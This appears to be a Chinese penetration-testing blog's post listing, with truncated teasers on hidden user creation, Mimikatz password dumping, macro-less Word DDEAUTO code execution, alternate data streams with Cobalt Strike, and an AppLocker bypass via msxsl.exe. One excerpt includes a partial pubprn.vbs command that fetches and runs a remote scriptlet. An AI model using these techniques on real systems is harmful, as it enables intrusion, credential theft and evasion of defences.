你能找到我么?-- 隐藏用户建立(Powershell)

最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题: ps:2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Contro ...

windows命令执行漏洞不会玩? 看我!

经常有小伙伴碰到了命令执行漏洞不会玩,比如mssql注入点的命令执行,怎么来获取一个meterpreter?这个时候,就需要想办法来获取了,关于命令行来执行远程命令的方法碰到很多,但是用的时候老会记不起来,所以在这里把碰到的作为一个总结,没准那种方法能 ...

MSWord Code Exec Without Macro

今天学到了一个新的Word执行代码的方式,也是不需要启用宏的,所以分享给大家一波。操作也挺简单的。 首先新建一个word文档,然后插入域: 选择 = (Formula) 右键,切换域代码 代码处修改为: {DDEAUTO c:\\windows\ ...

渗透中的ADS

为了测试,在这里使用Cobaltstrike 生成一个exe,用来查看文件是否上传成功,并可以顺利执行,每次上传文件以后,服务器自动删除,如下图: PS: meterpreter会话是通过powershell web_delivery获取的 尝试 ...

Some Tricks

远程执行sct的另一种姿势 cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubuserc ...

Bypass AppLocker With MSXSL.EXE

关于XSLT之前已经有几篇文章进行介绍了,Hack With XSLT,XXE with XSL,Xsl Exec Webshell ,今天分享一个通过MSXSL.exe绕过Applocker的方法。 msxsl.exe是微软用于命令行下处理XSL的一 ...